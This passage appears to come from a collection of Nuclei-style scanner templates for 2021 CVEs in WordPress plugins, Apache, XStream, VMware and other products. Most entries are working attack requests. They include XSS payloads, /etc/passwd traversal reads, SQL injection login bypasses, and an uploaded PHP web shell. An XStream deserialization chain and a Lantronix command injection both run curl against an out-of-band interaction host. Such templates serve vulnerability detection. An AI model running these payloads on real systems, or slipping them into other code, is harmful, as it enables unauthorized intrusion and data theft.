{{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body_4","words":["Event Log","Display Name"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nsp","group":1,"regex":["name=['\"]nsp['\"] value=['\"](.*)['\"]>"],"internal":true,"part":"body"},{"type":"regex","name":"nsp_auth","group":1,"regex":["var nsp_str = ['\"](.*)['\"];"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-3654","info":{"name":"Nova noVNC - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}//interact.sh/%2f.."],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]},{"type":"status","status":[302,301]}]}]},{"id":"CVE-2021-28918","info":{"name":"Netmask NPM Package - Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?url=http://0177.0.0.1/server-status","{{BaseURL}}/?host=http://0177.0.0.1/server-status","{{BaseURL}}/?file=http://0177.0.0.1/etc/passwd"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["Apache Server Status","Server Version"],"condition":"and"},{"type":"regex","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-20031","info":{"name":"SonicWall SonicOS 7.0 - Open Redirect","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{randstr}}.tld\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["https://{{randstr}}.tld/auth.html","Please be patient as you are being re-directed"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39327","info":{"name":"WordPress BulletProof Security 5.1 Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/bps-backup/logs/db_backup_log.txt","{{BaseURL}}/wp-content/plugins/bulletproof-security/admin/htaccess/db_backup_log.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["BPS DB BACKUP LOG","=================="],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29156","info":{"name":"LDAP Injection In OpenAM","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/openam/ui/PWResetUserValidation","{{BaseURL}}/OpenAM-11.0.0/ui/PWResetUserValidation","{{BaseURL}}/ui/PWResetUserValidation"],"matchers":[{"type":"dsl","dsl":["contains(body, \"jato.pageSession\") && status_code==200"]}]}]},{"id":"CVE-2021-25118","info":{"name":"Yoast SEO 16.7-17.2 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/posts?per_page=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","regex":["\"path\":\"(.*)/wp-content\\\\(.*)\",\"size"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["\"path\":\"(.*)/wp-content\\\\(.*)\",\"size"],"part":"body"}]}]},{"id":"CVE-2021-40978","info":{"name":"MKdocs 1.2.2 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:[x*]:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25063","info":{"name":"WordPress Contact Form 7 Skins <=2.5.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=cf7skins&tab=%27%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(document.domain)>' type='hidden"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24370","info":{"name":"WordPress Fancy Product Designer <4.6.9  - Arbitrary File Upload","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"error\":\"You need to define a directory"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29441","info":{"name":"Nacos <1.4.1 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nUser-Agent: Nacos-Server\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 403","status_code_2 == 200"],"condition":"and"},{"type":"dsl","dsl":["contains(body_1, 'Forbidden')","body_2 == 'true'"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2021-43510","info":{"name":"Sourcecodester Simple Client Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin'+or+'1'%3d'1'--+-&password=as\n","GET / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(header_1, \"text/html\")","status_code_1 == 200","contains(body_1, \"{\\\"status\\\":\\\"success\\\"}\")","contains(body_2, \"Welcome to Simple Client\")"],"condition":"and"}]}]},{"id":"CVE-2021-43778","info":{"name":"GLPI plugin Barcode < 2.6.1 - Path Traversal Vulnerability.","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24155","info":{"name":"WordPress BackupGuard <1.6.0 - Authenticated Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=backup_guard_backups HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php?action=backup_guard_importBackup&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nContent-Type: multipart/form-data; boundary=---------------------------204200867127808062083805313921\n\n-----------------------------204200867127808062083805313921\nContent-Disposition: form-data; name=\"files[]\"; filename=\"{{randstr}}.php\"\nContent-Type: application/x-php\n\n<?php\n\necho \"CVE-2021-24155\";\n\n?>\n\n-----------------------------204200867127808062083805313921--\n","GET /wp-content/uploads/backup-guard/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_4, \"text/html\")","status_code_4 == 200","contains(body_3, '{\\\"success\\\":1}')","contains(body_4, 'CVE-2021-24155')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["BG_BACKUP_STRINGS = {\"nonce\":\"([0-9a-zA-Z]+)\"};"],"internal":true}]}]},{"id":"CVE-2021-32853","info":{"name":"Erxes <0.23.0 - Cross-Site Scripting","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["topic_id: \"</script><script>alert(document.domain)</script>","window.erxesEnv"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-36356","info":{"name":"Kramer VIAware - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /ajaxPages/writeBrowseFilePathAjax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nradioBtnVal=%3C%3Fphp%0A++++++++if%28isset%28%24_GET%5B%27cmd%27%5D%29%29%0A++++++++%7B%0A++++++++++++system%28%24_GET%5B%27cmd%27%5D%29%3B%0A++++++++%7D%3F%3E&associateFileName=%2Fvar%2Fwww%2Fhtml%2F{{randstr}}.php\n","GET /{{randstr}}.php?cmd=sudo+rpm+--eval+'%25{lua%3aos.execute(\"curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'\")}' HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2021-24647","info":{"name":"Pie Register < 3.7.1.6 - Unauthenticated Arbitrary Login","severity":"high"},"requests":[{"raw":["GET /wp-content/plugins/pie-register/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","POST /login/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{randstr}}&pwd={{randstr}}&social_site=true&user_id_social_site=1&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/profile.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_1, \"pieregister\")","contains(body_3, \"Username\") && contains(body_3, \"email-description\")"],"condition":"and"}]}]},{"id":"CVE-2021-46071","info":{"name":"ehicle Service Management System 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /classes/Master.php?f=save_category HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=&category=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&status=1\n","GET /admin/?page=maintenance/category HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"<td>\\\"><script>alert(document.domain)</script></td>\")"],"condition":"and"}]}]},{"id":"CVE-2021-25003","info":{"name":"WordPress WPCargo Track & Trace <6.9.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/wpcargo/includes/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath={{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-content/plugins/wpcargo/includes/{{randstr}}.php?1=var_dump HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n2={{md5(num)}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_1 != 200","status_code_2 == 200","status_code_3 == 200","contains(body_3, md5(num))","contains(body_3, 'PNG')"],"condition":"and"}]}]},{"id":"CVE-2021-40149","info":{"name":"Reolink E1 Zoom Camera <=3.0.0.716 - Private Key Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/self.key"],"matchers-condition":"and","matchers":[{"type":"word","words":["-----BEGIN RSA PRIVATE KEY-----","-----END RSA PRIVATE KEY----"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-30497","info":{"name":"Ivanti Avalanche 6.3.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/AvalancheWeb/image?imageFilePath=C:/windows/win.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["for 16-bit app support"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20114","info":{"name":"TCExam <= 14.8.1 - Sensitive Information Exposure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cache/backup/"],"matchers-condition":"and","matchers":[{"type":"word","words":["Index of /cache/backup","Parent Directory",".sql.gz"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44139","info":{"name":"Alibaba Sentinel - Server-side request forgery (SSRF)","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/registry/machine?app={{rand_base(5)}}&appType=0&version=0&hostname={{rand_base(5)}}&ip={{interactsh-url}}&port=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["\"success\":true","\"msg\":\"success\""],"condition":"and"}]}]},{"id":"CVE-2021-22054","info":{"name":"VMWare Workspace ONE UEM - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/Catalog/BlobHandler.ashx?Url=YQB3AGUAdgAyADoAawB2ADAAOgB4AGwAawBiAEoAbwB5AGMAVwB0AFEAMwB6ADMAbABLADoARQBKAGYAYgBHAE4ATgBDADUARQBBAG0AZQBZAE4AUwBiAFoAVgBZAHYAZwBEAHYAdQBKAFgATQArAFUATQBkAGcAZAByAGMAMgByAEUAQwByAGIAcgBmAFQAVgB3AD0A"],"matchers-condition":"and","matchers":[{"type":"word","words":["Interactsh Server"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41467","info":{"name":"JustWriting  -  Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sync/dropbox/download?challenge=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42013","info":{"name":"Apache 2.4.49/2.4.50 - Path Traversal and Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /icons/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n\n","GET /icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n\n","POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\necho Content-Type: text/plain; echo; {{cmd}}\n\n"],"stop-at-first-match":true,"unsafe":true,"matchers-condition":"or","matchers":[{"type":"word","name":"RCE","words":["CVE-2021-42013"]},{"type":"regex","name":"LFI","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-30134","info":{"name":"Php-mod/curl Library <2.3.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/vendor/curl/curl/tests/server/php-curl-test/post_file_path_upload.php?key=<img%20src%20onerror%3dalert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","words":["key\":\"<img src onerror=alert(document.domain)>\""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21345","info":{"name":"XStream <1.4.16  - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<java.util.PriorityQueue serialization='custom'>\n  <unserializable-parents/>\n  <java.util.PriorityQueue>\n    <default>\n      <size>2</size>\n      <comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'>\n        <indexMap class='com.sun.xml.internal.ws.client.ResponseContext'>\n          <packet>\n            <message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'>\n              <dataSource class='com.sun.xml.internal.ws.message.JAXBAttachment'>\n                <bridge class='com.sun.xml.internal.ws.db.glassfish.BridgeWrapper'>\n                  <bridge class='com.sun.xml.internal.bind.v2.runtime.BridgeImpl'>\n                    <bi class='com.sun.xml.internal.bind.v2.runtime.ClassBeanInfoImpl'>\n                      <jaxbType>com.sun.corba.se.impl.activation.ServerTableEntry</jaxbType>\n                      <uriProperties/>\n                      <attributeProperties/>\n                      <inheritedAttWildcard class='com.sun.xml.internal.bind.v2.runtime.reflect.Accessor$GetterSetterReflection'>\n                        <getter>\n                          <class>com.sun.corba.se.impl.activation.ServerTableEntry</class>\n                          <name>verify</name>\n                          <parameter-types/>\n                        </getter>\n                      </inheritedAttWildcard>\n                    </bi>\n                    <tagName/>\n                    <context>\n                      <marshallerPool class='com.sun.xml.internal.bind.v2.runtime.JAXBContextImpl$1'>\n                        <outer-class reference='../..'/>\n                      </marshallerPool>\n                      <nameList>\n                        <nsUriCannotBeDefaulted>\n                          <boolean>true</boolean>\n                        </nsUriCannotBeDefaulted>\n                        <namespaceURIs>\n                          <string>1</string>\n                        </namespaceURIs>\n                        <localNames>\n                          <string>UTF-8</string>\n                        </localNames>\n                      </nameList>\n                    </context>\n                  </bridge>\n                </bridge>\n                <jaxbObject class='com.sun.corba.se.impl.activation.ServerTableEntry'>\n                  <activationCmd>curl http://{{interactsh-url}}</activationCmd>\n                </jaxbObject>\n              </dataSource>\n            </message>\n            <satellites/>\n            <invocationProperties/>\n          </packet>\n        </indexMap>\n      </comparator>\n    </default>\n    <int>3</int>\n    <string>javax.xml.ws.binding.attachments.inbound</string>\n    <string>javax.xml.ws.binding.attachments.inbound</string>\n  </java.util.PriorityQueue>\n</java.util.PriorityQueue>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2021-21978","info":{"name":"VMware View Planner <4.6 SP1- Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS\nAccept: text/html\nReferer: {{BaseURL}}\nConnection: close\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\nContent-Disposition: form-data; name=\"logfile\"; filename=\"\"\nContent-Type: text/plain\n\nPOC_TEST\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["len(body) == 28"]},{"type":"word","part":"body","words":["File uploaded successfully."]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46069","info":{"name":"Vehicle Service Management System 1.0 - Stored Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /classes/Master.php?f=save_mechanic HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=&name=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&contact=asd1&email=asd1@asd.com&status=1\n","GET /admin/?page=mechanics HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"<td>\\\"><script>alert(document.domain)</script></td>\")"],"condition":"and"}]}]},{"id":"CVE-2021-21881","info":{"name":"Lantronix PremierWave 2050 8.9.0.0R4 - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic dXNlcjp1c2Vy\nContent-Type: application/x-www-form-urlencoded\n\najax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid=\"'; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}' #\n","POST / HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46UEFTUw==\nContent-Type: application/x-www-form-urlencoded\n\najax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid=\"'; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2021-41951","info":{"name":"Resourcespace - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/wordpress_sso/pages/index.php?wordpress_user=%3Cscript%3Ealert(1)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["TEST<script>alert(1)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39322","info":{"name":"WordPress Easy Social Icons Plugin < 3.0.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php/</script><script>alert(document.domain)</script>/?page=cnss_social_icon_page HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24910","info":{"name":"WordPress Transposh Translation <1.0.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=tp_tp&e=g&m=s&tl=en&q=<img%20src%3dx%20onerror%3dalert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","{\"result\":"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24997","info":{"name":"WordPress Guppy <=1.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"guppyUsers\":","\"userId\":","\"type\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-33904","info":{"name":"Accela Civic Platform <=21.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5econfirm(document.domain)%5e%22a2pbrnzx5a9"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","words":["\"k3woq\"^confirm(document.domain)^\"a2pbrnzx5a9\"","servProvCode"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-30213","info":{"name":"Knowage Suite 7.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/knowage/servlet/AdapterHTTP?Page=LoginPage&NEW_SESSION=TRUE&TargetService=%2Fknowage%2Fservlet%2FAdapterHTTP%3FPage%3DLoginPage%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-33221","info":{"name":"CommScope Ruckus IoT Controller - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/service/v1/service-details"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","words":["message","ok","data","dns","gateway"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24838","info":{"name":"WordPress AnyComment <0.3.5 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://interact.sh","{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://interact.sh?a=https://interact.sh"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2021-27670","info":{"name":"Appspace 6.2.4 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/core/proxy/jsonprequest?objresponse=false&websiteproxy=true&escapestring=false&url=http://oast.live"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<h1> Interactsh Server </h1>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24298","info":{"name":"WordPress Simple Giveaways <2.36.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/giveaway/mygiveaways/?share=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41381","info":{"name":"Payara Micro Community 5.2021.6 Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.//WEB-INF/classes/META-INF/microprofile-config.properties"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["payara.security.openid.default.providerURI=","payara.security.openid.sessionScopedConfiguration=true"],"condition":"and"}]}]},{"id":"CVE-2021-30175","info":{"name":"ZEROF Web Server 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /HandleEvent HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nAjax=1&IsEvent=1&Obj=O4F&Evt=click&this=O4F&\"_fp_=_S_ID=CteTYLjmYw108029DC1&O33=%020%02%02'&O37=%020%02%02fff\"&_seq_=2&_uo_=O\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["You have an error in your SQL syntax"]},{"type":"word","part":"header","words":["ZEROF"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24165","info":{"name":"WordPress Ninja Forms <3.4.34 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin-ajax.php?client_id=1&redirect=https://interact.sh&action=nf_oauth_connect HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_1 == 302","status_code_2 == 302","contains(header_2, 'Location: https://interact.sh?client_id=1')"],"condition":"and"}]}]},{"id":"CVE-2021-28149","info":{"name":"Hongdian H8922 3.0.5 Devices - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET /log_download.cgi?type=../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\nCache-Control: max-age=0\nAuthorization: Basic Z3Vlc3Q6Z3Vlc3Q=\n","GET /log_download.cgi?type=../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46YWRtaW4=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"regex","part":"body","regex":["root:.*:0:0:","sshd:[x*]","root:[$]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31805","info":{"name":"Apache Struts2 S2-062 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF\nContent-Length: 1095\n\n------WebKitFormBoundaryl7d1B1aGsV2wcZwF\nContent-Disposition: form-data; 